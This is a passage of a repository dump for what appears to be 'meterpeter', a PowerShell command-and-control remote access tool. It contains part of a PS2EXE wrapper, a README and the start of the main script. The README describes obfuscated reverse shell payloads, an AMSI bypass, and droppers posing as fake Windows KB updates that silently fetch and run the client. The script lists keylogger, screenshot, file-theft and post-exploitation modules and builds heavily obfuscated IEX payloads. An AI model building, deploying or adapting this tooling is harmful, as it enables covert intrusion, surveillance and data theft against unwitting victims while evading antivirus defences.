exitCode)\r\n\t\t{\r\n\t\t\tthis.parent.ShouldExit = true;\r\n\t\t\tthis.parent.ExitCode = exitCode;\r\n\t\t}\r\n\t}\r\n\r\n\tinternal interface PS2EXEApp\r\n\t{\r\n\t\tbool ShouldExit { get; set; }\r\n\t\tint ExitCode { get; set; }\r\n\t}\r\n\r\n\tinternal class PS2EXE : PS2EXEApp\r\n\t{\r\n\t\tprivate bool shouldExit;\r\n\r\n\t\tprivate int exitCode;\r\n\r\n\t\tpublic bool ShouldExit\r\n\t\t{\r\n\t\t\tget { return this.shouldExit; }\r\n\t\t\tset { this.shouldExit = value; }\r\n\t\t}\r\n\r\n\t\tpublic int ExitCode\r\n\t\t{\r\n\t\t\tget { return this.exitCode; }\r\n\t\t\tset { this.exitCode = value; }\r\n\t\t}\r\n\r\n\t\t$(if ($STA){\"[STAThread]\"})$(if ($MTA){\"[MTAThread]\"})\r\n\t\tprivate static int Main(string[] args)\r\n\t\t{\r\n\t\t\t$culture\r\n\r\n\t\t\t$(if (!$noVisualStyles -and $noConsole) { \"Application.EnableVisualStyles();\" })\r\n\t\t\tPS2EXE me = new PS2EXE();\r\n\r\n\t\t\tbool paramWait = false;\r\n\t\t\tstring extractFN = string.Empty;\r\n\r\n\t\t\tPS2EXEHostUI ui = new PS2EXEHostUI();\r\n\t\t\tPS2EXEHost host = new PS2EXEHost(me, ui);\r\n\t\t\tSystem.Threading.ManualResetEvent mre = new System.Threading.ManualResetEvent(false);\r\n\r\n\t\t\tAppDomain.CurrentDomain.UnhandledException += new UnhandledExceptionEventHandler(CurrentDomain_UnhandledException);\r\n\r\n\t\t\ttry\r\n\t\t\t{\r\n\t\t\t\tusing (Runspace myRunSpace = RunspaceFactory.CreateRunspace(host))\r\n\t\t\t\t{\r\n\t\t\t\t\t$(if ($STA -or $MTA) {\"myRunSpace.ApartmentState = System.Threading.ApartmentState.\"})$(if ($STA){\"STA\"})$(if ($MTA){\"MTA\"});\r\n\t\t\t\t\tmyRunSpace.Open();\r\n\r\n\t\t\t\t\tusing (System.Management.Automation.PowerShell powershell = System.Management.Automation.PowerShell.Create())\r\n\t\t\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\t\t\tConsole.CancelKeyPress += new ConsoleCancelEventHandler(delegate(object sender, ConsoleCancelEventArgs e)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\ttry\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tpowershell.BeginStop(new AsyncCallback(delegate(IAsyncResult r)\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tmre.Set();\r\n\t\t\t\t\t\t\t\t\te.Cancel = true;\r\n\t\t\t\t\t\t\t\t}), null);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tcatch\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t});\r\n\"@ })\r\n\r\n\t\t\t\t\t\tpowershell.Runspace = myRunSpace;\r\n\t\t\t\t\t\tpowershell.Streams.Error.DataAdded += new EventHandler<DataAddedEventArgs>(delegate(object sender, DataAddedEventArgs e)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tui.WriteErrorLine(((PSDataCollection<ErrorRecord>)sender)[e.Index].ToString());\r\n\t\t\t\t\t\t});\r\n\r\n\t\t\t\t\t\tPSDataCollection<string> colInput = new PSDataCollection<string>();\r\n$(if (!$runtime20) {@\"\r\n\t\t\t\t\t\tif (ConsoleInfo.IsInputRedirected())\r\n\t\t\t\t\t\t{ // read standard input\r\n\t\t\t\t\t\t\tstring sItem = \"\";\r\n\t\t\t\t\t\t\twhile ((sItem = Console.ReadLine()) != null)\r\n\t\t\t\t\t\t\t{ // add to powershell pipeline\r\n\t\t\t\t\t\t\t\tcolInput.Add(sItem);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\"@ })\r\n\t\t\t\t\t\tcolInput.Complete();\r\n\r\n\t\t\t\t\t\tPSDataCollection<PSObject> colOutput = new PSDataCollection<PSObject>();\r\n\t\t\t\t\t\tcolOutput.DataAdded += new EventHandler<DataAddedEventArgs>(delegate(object sender, DataAddedEventArgs e)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tui.WriteLine(colOutput[e.Index].ToString());\r\n\t\t\t\t\t\t});\r\n\r\n\t\t\t\t\t\tint separator = 0;\r\n\t\t\t\t\t\tint idx = 0;\r\n\t\t\t\t\t\tforeach (string s in args)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tif (string.Compare(s, \"-wait\", true) == 0)\r\n\t\t\t\t\t\t\t\tparamWait = true;\r\n\t\t\t\t\t\t\telse if (s.StartsWith(\"-extract\", StringComparison.InvariantCultureIgnoreCase))\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tstring[] s1 = s.Split(new string[] { \":\" }, 2, StringSplitOptions.RemoveEmptyEntries);\r\n\t\t\t\t\t\t\t\tif (s1.Length != 2)\r\n\t\t\t\t\t\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\t\t\t\t\t\tConsole.WriteLine(\"If you specify the -extract option you need to add a file for extraction in this way\\r\\n -extract:\\\"<filename>\\\"\");\r\n\"@ } else {@\"\r\n\t\t\t\t\t\t\t\t\tMessageBox.Show(\"If you specify the -extract option you need to add a file for extraction in this way\\r\\n -extract:\\\"<filename>\\\"\", System.AppDomain.CurrentDomain.FriendlyName, MessageBoxButtons.OK, MessageBoxIcon.Error);\r\n\"@ })\r\n\t\t\t\t\t\t\t\t\treturn 1;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\textractFN = s1[1].Trim(new char[] { '\\\"' });\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\telse if (string.Compare(s, \"-end\", true) == 0)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tseparator = idx + 1;\r\n\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\telse if (string.Compare(s, \"-debug\", true) == 0)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tSystem.Diagnostics.Debugger.Launch();\r\n\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tidx++;\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\tstring script = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@\"$($script)\"));\r\n\r\n\t\t\t\t\t\tif (!string.IsNullOrEmpty(extractFN))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tSystem.IO.File.WriteAllText(extractFN, script);\r\n\t\t\t\t\t\t\treturn 0;\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\tpowershell.AddScript(script);\r\n\r\n\t\t\t\t\t\t// parse parameters\r\n\t\t\t\t\t\tstring argbuffer = null;\r\n\t\t\t\t\t\t// regex for named parameters\r\n\t\t\t\t\t\tSystem.Text.RegularExpressions.Regex regex = new System.Text.RegularExpressions.Regex(@\"^-([^: ]+)[ :]?([^:]*)$\");\r\n\r\n\t\t\t\t\t\tfor (int i = separator; i < args.Length; i++)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tSystem.Text.RegularExpressions.Match match = regex.Match(args[i]);\r\n\t\t\t\t\t\t\tif (match.Success && match.Groups.Count == 3)\r\n\t\t\t\t\t\t\t{ // parameter in powershell style, means named parameter found\r\n\t\t\t\t\t\t\t\tif (argbuffer != null) // already a named parameter in buffer, then flush it\r\n\t\t\t\t\t\t\t\t\tpowershell.AddParameter(argbuffer);\r\n\r\n\t\t\t\t\t\t\t\tif (match.Groups[2].Value.Trim() == \"\")\r\n\t\t\t\t\t\t\t\t{ // store named parameter in buffer\r\n\t\t\t\t\t\t\t\t\targbuffer = match.Groups[1].Value;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t// caution: when called in powershell $TRUE gets converted, when called in cmd.exe not\r\n\t\t\t\t\t\t\t\t\tif ((match.Groups[2].Value == \"$TRUE\") || (match.Groups[2].Value.ToUpper() == \"\\x24TRUE\"))\r\n\t\t\t\t\t\t\t\t\t{ // switch found\r\n\t\t\t\t\t\t\t\t\t\tpowershell.AddParameter(match.Groups[1].Value, true);\r\n\t\t\t\t\t\t\t\t\t\targbuffer = null;\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t\t// caution: when called in powershell $FALSE gets converted, when called in cmd.exe not\r\n\t\t\t\t\t\t\t\t\t\tif ((match.Groups[2].Value == \"$FALSE\") || (match.Groups[2].Value.ToUpper() == \"\\x24\"+\"FALSE\"))\r\n\t\t\t\t\t\t\t\t\t\t{ // switch found\r\n\t\t\t\t\t\t\t\t\t\t\tpowershell.AddParameter(match.Groups[1].Value, false);\r\n\t\t\t\t\t\t\t\t\t\t\targbuffer = null;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t\t{ // named parameter with value found\r\n\t\t\t\t\t\t\t\t\t\t\tpowershell.AddParameter(match.Groups[1].Value, match.Groups[2].Value);\r\n\t\t\t\t\t\t\t\t\t\t\targbuffer = null;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t{ // unnamed parameter found\r\n\t\t\t\t\t\t\t\tif (argbuffer != null)\r\n\t\t\t\t\t\t\t\t{ // already a named parameter in buffer, so this is the value\r\n\t\t\t\t\t\t\t\t\tpowershell.AddParameter(argbuffer, args[i]);\r\n\t\t\t\t\t\t\t\t\targbuffer = null;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t{ // position parameter found\r\n\t\t\t\t\t\t\t\t\tpowershell.AddArgument(args[i]);\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\tif (argbuffer != null) powershell.AddParameter(argbuffer); // flush parameter buffer...\r\n\r\n\t\t\t\t\t\t// convert output to strings\r\n\t\t\t\t\t\tpowershell.AddCommand(\"out-string\");\r\n\t\t\t\t\t\t// with a single string per line\r\n\t\t\t\t\t\tpowershell.AddParameter(\"stream\");\r\n\r\n\t\t\t\t\t\tpowershell.BeginInvoke<string, PSObject>(colInput, colOutput, null, new AsyncCallback(delegate(IAsyncResult ar)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tif (ar.IsCompleted)\r\n\t\t\t\t\t\t\t\tmre.Set();\r\n\t\t\t\t\t\t}), null);\r\n\r\n\t\t\t\t\t\twhile (!me.ShouldExit && !mre.WaitOne(100))\r\n\t\t\t\t\t\t{ };\r\n\r\n\t\t\t\t\t\tpowershell.Stop();\r\n\r\n\t\t\t\t\t\tif (powershell.InvocationStateInfo.State == PSInvocationState.Failed)\r\n\t\t\t\t\t\t\tui.WriteErrorLine(powershell.InvocationStateInfo.Reason.Message);\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tmyRunSpace.Close();\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tcatch (Exception ex)\r\n\t\t\t{\r\n$(if (!$noError) { if (!$noConsole) {@\"\r\n\t\t\t\tConsole.Write(\"An exception occured: \");\r\n\t\t\t\tConsole.WriteLine(ex.Message);\r\n\"@ } else {@\"\r\n\t\t\t\tMessageBox.Show(\"An exception occured: \" + ex.Message, System.AppDomain.CurrentDomain.FriendlyName, MessageBoxButtons.OK, MessageBoxIcon.Error);\r\n\"@ } })\r\n\t\t\t}\r\n\r\n\t\t\tif (paramWait)\r\n\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\tConsole.WriteLine(\"Hit any key to exit...\");\r\n\t\t\t\tConsole.ReadKey();\r\n\"@ } else {@\"\r\n\t\t\t\tMessageBox.Show(\"Click OK to exit...\", System.AppDomain.CurrentDomain.FriendlyName);\r\n\"@ })\r\n\t\t\t}\r\n\t\t\treturn me.ExitCode;\r\n\t\t}\r\n\r\n\t\tstatic void CurrentDomain_UnhandledException(object sender, UnhandledExceptionEventArgs e)\r\n\t\t{\r\n\t\t\tthrow new Exception(\"Unhandled exception in PS2EXE\");\r\n\t\t}\r\n\t}\r\n}\r\n\"@\r\n\r\n$configFileForEXE2 = \"<?xml version=\"\"1.0\"\" encoding=\"\"utf-8\"\" ?>`r`n<configuration><startup><supportedRuntime version=\"\"v2.0.50727\"\"/></startup></configuration>\"\r\n$configFileForEXE3 = \"<?xml version=\"\"1.0\"\" encoding=\"\"utf-8\"\" ?>`r`n<configuration><startup><supportedRuntime version=\"\"v4.0\"\" sku=\"\".NETFramework,Version=v4.0\"\" /></startup></configuration>\"\r\n\r\nif ($longPaths)\r\n{\r\n\t$configFileForEXE3 = \"<?xml version=\"\"1.0\"\" encoding=\"\"utf-8\"\" ?>`r`n<configuration><startup><supportedRuntime version=\"\"v4.0\"\" sku=\"\".NETFramework,Version=v4.0\"\" /></startup><runtime><AppContextSwitchOverrides value=\"\"Switch.System.IO.UseLegacyPathHandling=false;Switch.System.IO.BlockLongPaths=false\"\" /></runtime></configuration>\"\r\n}\r\n\r\n#Write-Output \"Compiling file...\"\r\n$cr = $cop.CompileAssemblyFromSource($cp, $programFrame)\r\nif ($cr.Errors.Count -gt 0)\r\n{\r\n\tif (Test-Path $outputFile)\r\n\t{\r\n\t\tRemove-Item $outputFile -Verbose:$FALSE\r\n\t}\r\n\tWrite-Error -ErrorAction Continue \"Could not create the PowerShell .exe file because of compilation errors. Use -verbose parameter to see details.\"\r\n\t$cr.Errors | ForEach-Object { Write-Verbose $_ -Verbose:$verbose}\r\n}\r\nelse\r\n{\r\n\tif (Test-Path $outputFile)\r\n\t{\r\n If($outputFile -match 'meterpeter'){$parsingPath = $outputFile -replace '\\\\PS2EXE',''}else{$parsingPath = $outputFile}\r\n\t\tWrite-Output \" Output file => $parsingPath `n`n\"\r\n\r\n\t\tif ($debug)\r\n\t\t{\r\n\t\t\t$cr.TempFiles | Where-Object { $_ -ilike \"*.cs\" } | Select-Object -First 1 | ForEach-Object {\r\n\t\t\t\t$dstSrc = ([System.IO.Path]::Combine([System.IO.Path]::GetDirectoryName($outputFile), [System.IO.Path]::GetFileNameWithoutExtension($outputFile)+\".cs\"))\r\n\t\t\t\tWrite-Output \"Source file name for debug copied: $($dstSrc)\"\r\n\t\t\t\tCopy-Item -Path $_ -Destination $dstSrc -Force\r\n\t\t\t}\r\n\t\t\t$cr.TempFiles | Remove-Item -Verbose:$FALSE -Force -ErrorAction SilentlyContinue\r\n\t\t}\r\n\t\tif ($CFGFILE)\r\n\t\t{\r\n\t\t\tif ($runtime20)\r\n\t\t\t{\r\n\t\t\t\t$configFileForEXE2 | Set-Content ($outputFile+\".config\") -Encoding UTF8\r\n\t\t\t}\r\n\t\t\tif ($runtime40)\r\n\t\t\t{\r\n\t\t\t\t$configFileForEXE3 | Set-Content ($outputFile+\".config\") -Encoding UTF8\r\n\t\t\t}\r\n\t\t\tWrite-Output \"Config file for EXE created\"\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t\tWrite-Error -ErrorAction \"Continue\" \" Output file => $outputFile not written`n`n\"\r\n\t}\r\n}\r\n\r\nif ($requireAdmin -or $supportOS -or $longPaths)\r\n{ if (Test-Path $($outputFile+\".win32manifest\"))\r\n\t{\r\n\t\tRemove-Item $($outputFile+\".win32manifest\") -Verbose:$FALSE\r\n\t}\r\n}\r\nIf(Test-Path \"Update-KB4524147.ps1\"){Remove-Item -Path \"Update-KB4524147.ps1\" -Force}\r\n" }, { "path": "README.md", "content": "Author: <b><i>@r00t-3xp10it</i></b><br />\r\nVersion release: <b><i>v2.10.14</i></b><br />\r\nDistros Supported: <b><i>Windows (x86|x64), Linux</i></b><br />\r\nInspired in the work of: ['@ZHacker13 - ReverseTCPShell'](https://github.com/ZHacker13/ReverseTCPShell)<br /><br />\r\n![banner](https://user-images.githubusercontent.com/23490060/163636021-4351eca6-b66b-4817-b4b9-182a66070584.png)<br />\r\n\r\n[![Version](https://img.shields.io/badge/meterpeter-v2.10.14-brightgreen.svg?maxAge=259200)]()\r\n[![Stage](https://img.shields.io/badge/Release-Stable-brightgreen.svg)]()\r\n[![Build](https://img.shields.io/badge/OS-Windows,Linux-orange.svg)]()\r\n![licence](https://img.shields.io/badge/license-GPLv3-brightgreen.svg)\r\n![Last Commit](https://img.shields.io/github/last-commit/r00t-3xp10it/meterpeter)\r\n![isues](https://img.shields.io/github/issues/r00t-3xp10it/meterpeter)\r\n![Repo Size](https://img.shields.io/github/repo-size/r00t-3xp10it/meterpeter)\r\n\r\n<br />\r\n\r\n## :octocat: Quick Jump List<br />\r\n- **[Project Description](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#octocat-project-description)**<br />\r\n- **[List Of Available Modules](https://gist.github.com/r00t-3xp10it/4b066797ddc99a3fc41195ddfaf4af9b?permalink_comment_id=4133582#gistcomment-4133582)**<br />\r\n- **[Meterpeter C2 Latest Release](https://github.com/r00t-3xp10it/meterpeter/releases/tag/v2.10.14)**<br />\r\n- **[How To - Under Linux Distributions](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#attacker-machine-linux-kali)**<br />\r\n- **[How To - Under Windows Distributions](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#attacker-machiner-windows-pc)**<br />\r\n- **[Special Thanks|Contributions|Videos](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#video-tutorials)**<br />\r\n- **[Please Read my 'WIKI' page for detailed information about each Module](https://github.com/r00t-3xp10it/meterpeter/wiki)**<br />\r\n\r\n<br />\r\n\r\n## :octocat: Project Description\r\nThis PS1 starts a listener Server on a Windows|Linux attacker machine and generates oneliner PS reverse shell payloads obfuscated in BXOR with a random secret key and another layer of Characters/Variables Obfuscation to be executed on the victim machine (The payload will also execute AMSI reflection bypass in current session to evade AMSI detection while working). You can also recive the generated oneliner reverse shell connection via netcat. (in this case you will lose the C2 functionalities like screenshot, upload, download files, Keylogger, AdvInfo, PostExploit, etc)<br /><br />meterpeter payloads/droppers can be executed using User or Administrator Privileges depending of the cenario (executing the Client as Administrator will unlock ALL Server Modules, amsi bypasses, etc.). Droppers mimic a fake KB Security Update while in background download\\exec Client in '<b><i>$Env:TMP</i></b>' trusted location, with the intent of evading Windows Defender Exploit Guard. meterpeter payloads|droppers are FUD (please dont test samples on VirusTotal).<br />\r\n\r\nUnder Linux users required to install **powershell** and **apache2** webserver, Under Windows its optional the install of **python3** http.server to deliver payloads under LAN networks. If this requirements are **NOT** met, then the Client ( <b><i>Update-KB4524147.ps1</i></b> ) will be written in meterpeter working directory for manual deliver.\r\n![oki1](https://user-images.githubusercontent.com/23490060/135849854-575d3dcd-21c5-44a1-96fe-3684d586c128.png)<br />\r\n\r\n<br />\r\n\r\n**[Quick Jump List](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#octocat-quick-jump-list)**<br />\r\n\r\n\r\n---\r\n\r\n<br /><br />\r\n\r\n### ATTACKER MACHINE: [Linux Kali]\r\n Warning: powershell under linux distributions its only available for x64 bits archs ..\r\n![linux](https://user-images.githubusercontent.com/23490060/74575258-26951700-4f7e-11ea-832c-512dce1c97cc.png)\r\n\r\n<br />\r\n\r\n#### Install Powershell (Linux x64 bits)\r\n```\r\napt-get update && apt-get install -y powershell\r\n```\r\n\r\n#### Install Apache2\r\n```\r\napt-get install Apache2\r\n```\r\n\r\n#### Start Apache2 WebServer\r\n```\r\nservice apache2 start\r\n```\r\n\r\n#### Start C2 Server (Local)\r\n```\r\ncd meterpeter\r\npwsh -File meterpeter.ps1\r\n```\r\n\r\n#### Deliver Dropper/Payload To Target Machine (apache2)\r\n```\r\nUSE THE 'Attack Vector URL' TO DELIVER 'Update-KB4524147.zip' (dropper) TO TARGET ..\r\nUNZIP (IN DESKTOP) AND EXECUTE 'Update-KB4524147.bat' (Run As Administrator)..\r\n```\r\n\r\n#### Remark:\r\n\r\n IF dropper.bat its executed: Then the Client will use $env:tmp has its working directory ('recomended')..\r\n IF Attacker decided to manualy execute Client: Then Client remote location (pwd) will be used has working dir .\r\n\r\n\r\n**[Quick Jump List](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#octocat-quick-jump-list)**<br />\r\n\r\n---\r\n\r\n<br /><br />\r\n\r\n### ATTACKER MACHINER: [Windows PC]\r\n![frd](https://user-images.githubusercontent.com/23490060/74575907-b76cf200-4f80-11ea-8f44-ddd79fbd812f.png)\r\n\r\n<br />\r\n\r\n#### Install Python3 (optional)\r\nInstall Python3 (http.Server) to deliver payloads under LAN networks ..<br />\r\n```\r\nhttps://www.python.org/downloads/release/python-381/\r\n```\r\n\r\nCheck if python **http.server** its installed<br />\r\n```\r\n$Local_Host = ((ipconfig | findstr [0-9].\\.)[0]).Split()[-1]\r\npython -m http.server 8080 --bind $Local_Host\r\nCTRL+C # Exit webserver console\r\n```\r\n\r\n\r\n#### Start C2 Server (Local)\r\n```\r\ncd meterpeter\r\npowershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser\r\npowershell -File meterpeter.ps1\r\n```\r\n\r\n**Remark**\r\n- meterpeter.ps1 delivers Dropper/Payload using python3 http.server. IF attacker has python3 installed.<br />\r\n **'If NOT then the payload (Client) its written in Server Local [Working Directory](https://github.com/r00t-3xp10it/meterpeter/wiki/How-To-Display%7CChange-'Client'-Working-Directory) to be Manualy Deliver'** ..\r\n\r\n- Remmnenber to close the http.server terminal after the target have recived the two files (Dropper & Client)<br />\r\n **'And we have recived the connection in our meterpeter Server { to prevent Server|Client connection errors }'**<br /><br />\r\n\r\n#### Deliver Dropper/Payload To Target Machine (manual OR python3)\r\n```\r\nDELIVER 'Update-KB4524147' (.ps1=manual) OR (.zip=automated|silentExec) TO TARGET ..\r\n```\r\n\r\n#### Remark:\r\n\r\n IF dropper.bat its executed: Then the Client will use $env:tmp has its working directory ('recomended')..\r\n IF Attacker decided to manualy execute Client: Then Client remote location (pwd) will be used has working dir .\r\n\r\n**[Quick Jump List](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#octocat-quick-jump-list)**<br />\r\n\r\n---\r\n\r\n<br />\r\n\r\n### Video Tutorials:\r\nmeterpeter Under Windows Distros: https://www.youtube.com/watch?v=d2npuCXsMvE<br />\r\nmeterpeter Under Linux Distros: https://www.youtube.com/watch?v=CmMbWmN246E<br /><br />\r\n\r\n### Special Thanks:\r\n**@ZHacker13** (Original Rev Shell) | **@tedburke** (CommandCam.exe binary)<br />\r\n**@codings9** (debugging modules) | @ShantyDamayanti (debugging Modules)<br />\r\n**@AHLASaad** (debugging Modules) | **@gtworek** (EnableAllParentPrivileges)<br /><br />\r\n- **[meterpeter WIKI pages (Oficial Documentation)](https://github.com/r00t-3xp10it/meterpeter/wiki)**<br />\r\n- **[Jump To Top of this readme File](https://github.com/r00t-3xp10it/meterpeter/blob/master/README.md#octocat-quick-jump-list)**<br />\r\n---\r\n\r\n<br />\r\n" }, { "path": "meterpeter.ps1", "content": "##\r\n# Author: @r00t-3xp10it (ssa redteam)\r\n# Tested Under: Windows 10 (19044) x64 bits\r\n# Required Dependencies: Invoke-WebRequest\r\n# Optional Dependencies: BitsTransfer|Python\r\n# PS cmdlet Dev version: V2.10.14\r\n# PS cmdlet sub version: V2.10.14.0\r\n# GitHub: https://github.com/r00t-3xp10it/meterpeter/releases\r\n##\r\n\r\n$SserverTime = Get-Date -Format \"dd/MM/yyyy HH:mm:ss\"\r\n$HTTP_PORT = \"8087\" # Python http.server LPort (optional)\r\n$CmdLetVersion = \"2.10.14\" # meterpeter C2 version (dont change)\r\n$DeveloVersion = \"2.10.14.0\" # meterpeter C2 dev version (dont change)\r\n$payload_name = \"Update-KB5005101\" # Client-payload filename (dont change)\r\n$Dropper_Name = \"Update-KB5005101\" # Payload-dropp`er filename (optional)\r\n$Acdst = \"rem#ote ac#ce#ss\" -replace '#',''\r\n$Acdts = \"ob#fus#cat#ed\" -replace '#',''\r\n\r\n$EndBanner = @\"\r\n\r\n __ __ ____ _____ ____ ____ ____ ____ _____ ____ ____ \r\n | \\/ || ===||_ _|| ===|| () )| ()_)| ===||_ _|| ===|| () )\r\n |_|\\/|_||____| |_| |____||_|\\_\\|_| |____| |_| |____||_|\\_\\\r\n Author: @ZHacker13 &('r00t-3xp10it') - SSA_redteam @2023 V${CmdLetVersion}\r\n Date: $SserverTime - Cmdlet subdevelop version: $DeveloVersion\r\n\"@;\r\n\r\n$StartBanner = @\"\r\n\r\n __ __ ____ _____ ____ ____ ____ ____ _____ ____ ____ \r\n | \\/ || ===||_ _|| ===|| () )| ()_)| ===||_ _|| ===|| () )\r\n |_|\\/|_||____| |_| |____||_|\\_\\|_| |____| |_| |____||_|\\_\\\r\n Author: @ZHacker13 &('r00t-3xp10it') - SSA_redteam @2023 V${CmdLetVersion}\r\n\r\n Meterpeter its a command & control (C2) $Acdst tool (rat)\r\n written in pure powershell released to windows (python3 required)\r\n or to linux (powershell and apache2 required) distros. It creates\r\n reverse_tcp_shell payloads (pure powershell + sockets) $Acdts\r\n in BXOR using a secret key and also creates one dropper file that\r\n allow users to fast deliver the payload on LAN networks for tests.\r\n\"@;\r\n\r\n$Modules = @\"\r\n\r\n __ __ ____ _____ ____ ____ ____ ____ _____ ____ ____ \r\n | \\/ || ===||_ _|| ===|| () )| ()_)| ===||_ _|| ===|| () )\r\n |_|\\/|_||____| |_| |____||_|\\_\\|_| |____| |_| |____||_|\\_\\\r\n Author: @ZHacker13 &('r00t-3xp10it') - SSA_redteam @2023 V${CmdLetVersion}\r\n\r\n\r\n Command Description\r\n ------- ------------------------------\r\n Info Remote host system information\r\n Session Meterpeter C2 connection status\r\n AdvInfo Advanced system information sub-menu\r\n Upload Upload from local host to remote host\r\n Download Download from remote host to local host\r\n Screenshot Capture remote host desktop screenshots\r\n keylogger Install remote host keyloggers sub-menu\r\n PostExploit Post Exploitation modules sub-menu\r\n NetScanner Local LAN network scanner sub-menu\r\n Pranks Prank remote host modules sub-menu\r\n exit Exit rev_tcp_shell [server+client]\r\n\r\n\r\n\"@;\r\n\r\n\r\ntry{#Check http.server\r\n $MyServer = python -V\r\n If(-not($MyServer) -or $MyServer -eq $null)\r\n {\r\n $strMsg = \"Warning: python (http.server) not found in current system.\" + \"`n\" + \" 'Install python (http.server) to deliver payloads on LAN'..\"\r\n powershell (New-Object -ComObject Wscript.Shell).Popup($strMsg,10,'Deliver Meterpeter payloads on LAN',0+48)|Out-Null\r\n }\r\n Else\r\n {\r\n $PInterpreter = \"python\"\r\n }\r\n}Catch{\r\n powershell (New-Object -ComObject Wscript.Shell).Popup(\"python interpreter not found ...\",6,'Deliver Meterpeter payloads on LAN',0+48)|Out-Null\r\n}\r\n\r\n\r\nfunction Char_Obf($String){\r\n\r\n $String = $String.toCharArray(); \r\n ForEach($Letter in $String)\r\n {\r\n $RandomNumber = (1..2) | Get-Random;\r\n \r\n If($RandomNumber -eq \"1\")\r\n {\r\n $Letter = \"$Letter\".ToLower();\r\n }\r\n\r\n If($RandomNumber -eq \"2\")\r\n {\r\n $Letter = \"$Letter\".ToUpper();\r\n }\r\n\r\n $RandomString += $Letter;\r\n $RandomNumber = $Null;\r\n }\r\n \r\n $String = $RandomString;\r\n Return $String;\r\n}\r\n\r\nfunction msaudite($String){\r\n\r\n $finalcmdline = \"ASC\" + \"II\" -join ''\r\n $PowerShell = \"I`E`X(-Jo\" + \"in((@)|%{[char](`$_-BX\" + \"OR #)}));Exit\" -join ''\r\n $Key = '0x' + ((0..5) | Get-Random) + ((0..9) + ((65..70) + (97..102) | % {[char]$_}) | Get-Random);Start-Sleep -Milliseconds 30\r\n ( '!'|% {${~ }= +$()}{ ${ /'}=${~ }} {${) } = ++ ${~ }}{ ${;.*}=( ${~ }=${~ }+ ${) }) }{ ${)#+} =(${~ } = ${~ } + ${) } )} { ${~(}=(${~ }= ${~ } + ${) } ) }{ ${*-}= (${~ } =${~ }+${) })}{${()``}=(${~ }= ${~ } + ${) } )} {${]/!}= ( ${~ } = ${~ } + ${) })} {${# } = (${~ } = ${~ }+ ${) } ) }{${*;} = (${~ }= ${~ }+ ${) } )} {${/} =\"[\"+ \"$(@{ })\"[ ${]/!} ]+ \"$(@{ })\"[\"${) }${*;}\"]+ \"$( @{ } )\"[ \"${;.*}${ /'}\"]+\"$? \"[ ${) } ] + \"]\" }{${~ } = \"\".(\"$(@{}) \"[\"${) }${~(}\" ]+\"$( @{ }) \"[\"${) }${()``}\"]+\"$( @{ }) \"[ ${ /'}] + \"$( @{ } )\"[ ${~(} ]+ \"$? \"[ ${) }]+ \"$(@{ } )\"[${)#+}] ) } { ${~ }=\"$(@{})\"[ \"${) }${~(}\"] +\"$(@{ })\"[ ${~(} ]+ \"${~ }\"[ \"${;.*}${]/!}\" ] } ) ; .${~ }( \" ${/}${)#+}${()``}+ ${/}${# }${)#+}+ ${/}${) }${) }${()``}+${/}${) }${) }${~(} +${/}${) }${ /'}${*-}+${/}${) }${) }${ /'} + ${/}${) }${ /'}${)#+} +${/}${)#+}${;.*} + ${/}${()``}${) }+ ${/}${)#+}${;.*} +${/}${)#+}${()``}+ ${/}${~(}${ /'} + ${/}${*;}${) }+${/}${# }${)#+} + ${/}${) }${;.*}${) }+ ${/}${) }${) }${*-}+${/}${) }${) }${()``} + ${/}${) }${ /'}${) }+ 